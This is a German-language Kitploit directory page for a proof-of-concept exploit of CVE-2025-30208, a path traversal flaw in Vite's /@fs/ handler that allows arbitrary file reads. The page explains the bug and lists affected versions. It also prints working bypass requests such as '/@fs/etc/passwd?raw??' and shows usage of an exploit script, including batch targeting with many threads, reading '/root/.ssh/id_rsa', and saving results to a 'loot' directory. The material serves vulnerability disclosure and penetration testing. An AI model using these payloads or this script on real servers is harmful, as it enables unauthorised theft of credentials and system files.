Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-30208 — Ein PoC des Exploit-Skripts für die Schwachstelle 'Arbitrary File Read' von Vite /@fs/ Path Traversal in der transformMiddleware (CVE-2025-30208). | Kitploit
Tools/GitHubGitHub/4xura/cve-2025-30208
SchwachstellenanalyseExploitationWebanwendungs-ExploitationInformationsbeschaffungPenetrationstests
GitHub4xura/cve-2025-30208

CVE-2025-30208

Ein PoC des Exploit-Skripts für die Schwachstelle 'Arbitrary File Read' von Vite /@fs/ Path Traversal in der transformMiddleware (CVE-2025-30208).

Repository anzeigen
1052vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2025-30208

Ein PoC des Exploit-Skripts für die Arbitrary File Read-Sicherheitslücke von Vite /@fs/ Path Traversal in transformMiddleware (CVE-2025-30208). Eine detaillierte Analyse finden Sie in diesem Beitrag.

Verwundbar in Versionen vor:

  • 6.2.3
  • 6.1.2
  • 6.0.12
  • 5.4.15
  • 4.5.10

Übersicht

Vite ist ein beliebtes Open-Source-Projekt, das von Github und seiner offiziellen Website bezogen werden kann. Es verwendet ein spezielles Präfix, @fs, um direkten Zugriff auf absolute Dateipfade im Entwicklungsmodus zu ermöglichen:

root@kitploit:~
GET /@fs/<absolute/path/to/file>

Aber um Missbrauch zu verhindern, beschränkt Vite, was über @fs zugegriffen werden kann, mit einer Konfiguration wie:

root@kitploit:~
server: {
  fs: {
    allow: [path.resolve(__dirname, 'src')]
  }
}

Theoretisch sollten Dateien außerhalb des erlaubten Verzeichnisses (wie /etc/passwd) blockiert werden – selbst wenn jemand Tricks wie ../../../ verwendet.

Jedoch liegt der Fehler darin, wie Vite URLs parst und überprüft (über die Middleware/Funktion transformMiddleware). Die Middleware/Funktion verwendet ensureServingAccess(url, ...), um zu prüfen, ob eine Dateianfrage über /@fs/ erlaubt war.

Allerdings könnte ein Angreifer eine Anfrage mit nachgestellten Query-Trennzeichen in der URL erstellen, wie:

root@kitploit:~
GET /@fs/etc/passwd?raw??
GET /@fs/etc/passwd?raw&url
GET /@fs/etc/passwd?import&raw??

Diese Formen würden die regulären Ausdrucksfilter (rawRE, urlRE) und Sicherheitsprüfungen umgehen, da die fehlerhafte Abfragezeichenfolge immer noch mit der Routenlogik übereinstimmt. Was passiert:

  1. Der Pfad ist /@fs/../../../etc/passwd
  2. Die Abfragezeichenfolge ist raw?? (absichtlich fehlerhaft)
  3. Intern versucht Vite, nachgestellte Zeichen wie ? zu entfernen oder zu normalisieren, und dies geschieht bevor überprüft wird, ob der Dateipfad erlaubt ist.
  4. Die Überprüfung scheitert jedoch daran, die Abfragezeichenfolge korrekt zu parsen und abzugleichen, sodass die Whitelist-Logik nicht angewendet wird.

Das bedeutet:

  • Die Anfrage umgeht die Prüfung von server.fs.allow.
  • Vite behandelt sie als gültige Dateizugriffsanfrage.
  • Und es liest und gibt beliebige Dateien wie /etc/passwd zurück, falls vorhanden.

PoC-Verwendung

Grundlegende Verwendung

root@kitploit:~
python3 poc.py [OPTIONS]

Optionen

Flag / OptionBeschreibung
-u, --urlEinzelne Ziel-URL (z.B. example.com:5173)
-f, --fileDatei mit Liste von Zielen (eine URL pro Zeile)
-p, --pathDateisystempfad zum Lesen (Standard: /etc/passwd)
-b, --bypassAbfragezeichenfolge zur Umgehung der Routenvalidierung (Standard: ?raw??)
--proxyProxy-URL (z.B. http://127.0.0.1:8080)
-o, --outputAusgabeverzeichnis zum Speichern der Exploit-Ergebnisse (Standard: results)
-t, --threadsAnzahl der Threads für den Batch-Modus (Standard: 10)
-h, --helpHilfemeldung anzeigen und beenden

Beispiele

Einzelziel-Exploit:

root@kitploit:~
python3 cve-2025-30208.py -u example.com:5173

Einzelziel mit benutzerdefiniertem LFI-Pfad, um die gewünschte Datei auszulesen:

root@kitploit:~
python3 cve-2025-30208.py -u example.com:5173 -p '/root/.ssh/id_rsa'

Batch-Exploit mit mehreren Zielen:

root@kitploit:~
python3 cve-2025-30208.py -f targets.txt

Benutzerdefinierte Umgehungsabfrage:

root@kitploit:~
python3 cve-2025-30208.py -u example.com:5173 -b "?raw&url"

Verwendung eines Proxys (z.B. Burp Suite):

root@kitploit:~
python3 cve-2025-30208.py -u example.com:5173 --proxy http://127.0.0.1:8080

Benutzerdefiniertes Ausgabeverzeichnis:

root@kitploit:~
python3 cve-2025-30208.py -u example.com:5173 -o ./loot

Erhöhung der Thread-Anzahl im Batch-Modus:

root@kitploit:~
python3 cve-2025-30208.py -f targets.txt -t 50
Tool herunterladen